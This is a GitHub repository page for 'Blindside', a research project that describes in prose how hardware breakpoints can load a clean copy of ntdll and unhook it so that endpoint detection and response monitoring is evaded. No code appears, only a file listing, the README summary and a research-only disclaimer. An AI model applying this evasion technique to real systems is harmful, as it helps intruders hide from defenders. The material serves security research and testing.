Skip to content
/ Blindside Public

Utilizing hardware breakpoints to evade monitoring by Endpoint Detection and Response platforms

License

GPL-3.0 license
105 stars 17 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

CymulateResearch/Blindside

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
Blindside
Blindside
 
 
Blindside.sln
Blindside.sln
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

Blinside

Blindside is a technique for evading the monitoring of endpoint detection and response (EDR) and extended detection and response (XDR) platforms using hardware breakpoints to inject commands and perform unexpected, unwanted, or malicious operations. It involves creating a breakpoint handler, and setting a hardware breakpoint that will force the debugged process to load only ntdll to memory. This will result in a clean and unhooked ntdll which then could be copied to our process and unhook the original ntdll.

Please note that this technique should only be used for research and testing purposes and should not be used for any illegal or malicious activities. This repository contains the necessary code and instructions for implementing the Blindside technique.

About

Utilizing hardware breakpoints to evade monitoring by Endpoint Detection and Response platforms

Resources

Readme

License

GPL-3.0 license
Activity

Stars

105 stars

Watchers

4 watching

Forks

17 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages